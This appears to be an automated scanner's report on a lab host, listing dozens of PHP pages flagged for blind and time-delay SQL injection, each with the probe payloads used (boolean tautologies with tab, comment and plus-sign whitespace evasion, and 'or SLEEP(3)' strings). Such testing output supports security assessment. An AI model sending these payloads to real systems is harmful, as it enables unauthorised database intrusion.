Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	67316=67316
	and	71676=71676
	or	16540=16540#
	and	98333=98334
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'19023'='19023
'/**/and/**/'84888'='84888
'/**/or/**/39884=39884#
'/**/and/**/'68866'='68867
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	67316=67316
	and	71676=71676
	or	16540=16540#
	and	98333=98334
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	67316=67316
	and	71676=71676
	or	16540=16540#
	and	98333=98334
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
50676=50676

and
14892=14892

or
44586=44586#

and
27349=27350
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'59558'='59558
'+and+'69125'='69125
'+or+34279=34279#
'+and+'14954'='14955
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'40907'='40907
'	and	'78512'='78512
'	or	33206=33206#
'	and	'91038'='91039
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---